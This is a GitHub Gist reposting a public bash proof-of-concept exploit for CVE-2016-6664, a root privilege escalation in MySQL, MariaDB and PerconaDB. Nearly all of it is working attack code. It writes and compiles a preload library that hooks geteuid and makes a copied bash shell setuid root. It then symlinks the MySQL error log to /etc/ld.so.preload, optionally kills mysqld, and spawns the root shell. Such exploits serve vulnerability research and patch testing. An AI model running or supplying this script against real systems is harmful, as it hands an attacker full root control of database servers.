Created
April 18, 2023 21:11
-
-
Save FrenchBen/0a92ace8b3b15038b028f2091d2901ce to your computer and use it in GitHub Desktop.
Script for https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash -p | |
| # | |
| # Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh | |
| # | |
| # MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit | |
| # mysql-chowned.sh (ver. 1.0) | |
| # | |
| # CVE-2016-6664 / OCVE-2016-5617 | |
| # | |
| # Discovered and coded by: | |
| # | |
| # Dawid Golunski | |
| # dawid[at]legalhackers.com | |
| # | |
| # https://legalhackers.com | |
| # | |
| # Follow https://twitter.com/dawid_golunski for updates on this advisory. | |
| # | |
| # This PoC exploit allows attackers to (instantly) escalate their privileges | |
| # from mysql system account to root through unsafe error log handling. | |
| # The exploit requires that file-based logging has been configured (default). | |
| # To confirm that syslog logging has not been enabled instead use: | |
| # grep -r syslog /etc/mysql | |
| # which should return no results. | |
| # | |
| # This exploit can be chained with the following vulnerability: | |
| # CVE-2016-6663 / OCVE-2016-5616 | |
| # which allows attackers to gain access to mysql system account (mysql shell). | |
| # | |
| # In case database server has been configured with syslog you may also use: | |
| # CVE-2016-6662 as an alternative to this exploit. | |
| # | |
| # Usage: | |
| # ./mysql-chowned.sh path_to_error.log | |
| # | |
| # | |
| # See the full advisory for details at: | |
| # https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html | |
| # | |
| # Video PoC: | |
| # https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html | |
| # | |
| # | |
| # Disclaimer: | |
| # For testing purposes only. Do no harm. | |
| # | |
| BACKDOORSH="/bin/bash" | |
| BACKDOORPATH="/tmp/mysqlrootsh" | |
| PRIVESCLIB="/tmp/privesclib.so" | |
| PRIVESCSRC="/tmp/privesclib.c" | |
| SUIDBIN="/usr/bin/sudo" | |
| function cleanexit { | |
| # Cleanup | |
| echo -e "\n[+] Cleaning up..." | |
| rm -f $PRIVESCSRC | |
| rm -f $PRIVESCLIB | |
| rm -f $ERRORLOG | |
| touch $ERRORLOG | |
| if [ -f /etc/ld.so.preload ]; then | |
| echo -n > /etc/ld.so.preload | |
| fi | |
| echo -e "\n[+] Job done. Exiting with code $1 \n" | |
| exit $1 | |
| } | |
| function ctrl_c() { | |
| echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." | |
| cleanexit 0 | |
| } | |
| #intro | |
| echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n" | |
| echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m" | |
| # Args | |
| if [ $# -lt 1 ]; then | |
| echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n" | |
| echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n" | |
| exit 3 | |
| fi | |
| # Priv check | |
| echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m" | |
| id | grep -q mysql | |
| if [ $? -ne 0 ]; then | |
| echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n" | |
| exit 3 | |
| fi | |
| # Set target paths | |
| ERRORLOG="$1" | |
| if [ ! -f $ERRORLOG ]; then | |
| echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n" | |
| exit 3 | |
| fi | |
| echo -e "\n[+] Target MySQL log file set to $ERRORLOG" | |
| # [ Active exploitation ] | |
| trap ctrl_c INT | |
| # Compile privesc preload library | |
| echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" | |
| cat <<_solibeof_>$PRIVESCSRC | |
| #define _GNU_SOURCE | |
| #include <stdio.h> | |
| #include <sys/stat.h> | |
| #include <unistd.h> | |
| #include <dlfcn.h> | |
| #include <sys/types.h> | |
| #include <sys/stat.h> | |
| #include <fcntl.h> | |
| uid_t geteuid(void) { | |
| static uid_t (*old_geteuid)(); | |
| old_geteuid = dlsym(RTLD_NEXT, "geteuid"); | |
| if ( old_geteuid() == 0 ) { | |
| chown("$BACKDOORPATH", 0, 0); | |
| chmod("$BACKDOORPATH", 04777); | |
| //unlink("/etc/ld.so.preload"); | |
| } | |
| return old_geteuid(); | |
| } | |
| _solibeof_ | |
| /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" | |
| if [ $? -ne 0 ]; then | |
| echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." | |
| cleanexit 2; | |
| fi | |
| # Prepare backdoor shell | |
| cp $BACKDOORSH $BACKDOORPATH | |
| echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" | |
| # Safety check | |
| if [ -f /etc/ld.so.preload ]; then | |
| echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." | |
| exit 2 | |
| fi | |
| # Symlink the log file to /etc | |
| rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG | |
| if [ $? -ne 0 ]; then | |
| echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." | |
| cleanexit 3 | |
| fi | |
| echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`" | |
| # Wait for MySQL to re-open the logs | |
| echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n" | |
| read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER | |
| if [ "$THE_ANSWER" = "y" ]; then | |
| echo -e "Got it. Executing 'killall mysqld' now..." | |
| killall mysqld | |
| fi | |
| while :; do | |
| sleep 0.1 | |
| if [ -f /etc/ld.so.preload ]; then | |
| echo $PRIVESCLIB > /etc/ld.so.preload | |
| rm -f $ERRORLOG | |
| break; | |
| fi | |
| done | |
| # /etc/ dir should be owned by mysql user at this point | |
| # Inject the privesc.so shared library to escalate privileges | |
| echo $PRIVESCLIB > /etc/ld.so.preload | |
| echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`" | |
| echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" | |
| echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" | |
| chmod 755 /etc/ld.so.preload | |
| # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) | |
| echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" | |
| sudo 2>/dev/null >/dev/null | |
| #while :; do | |
| # sleep 0.1 | |
| # ps aux | grep mysqld | grep -q 'log-error' | |
| # if [ $? -eq 0 ]; then | |
| # break; | |
| # fi | |
| #done | |
| # Check for the rootshell | |
| ls -l $BACKDOORPATH | |
| ls -l $BACKDOORPATH | grep rws | grep -q root | |
| if [ $? -eq 0 ]; then | |
| echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" | |
| echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m" | |
| else | |
| echo -e "\n[!] Failed to get root" | |
| cleanexit 2 | |
| fi | |
| # Execute the rootshell | |
| echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n" | |
| $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" | |
| $BACKDOORPATH -p | |
| # Job done. | |
| cleanexit 0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment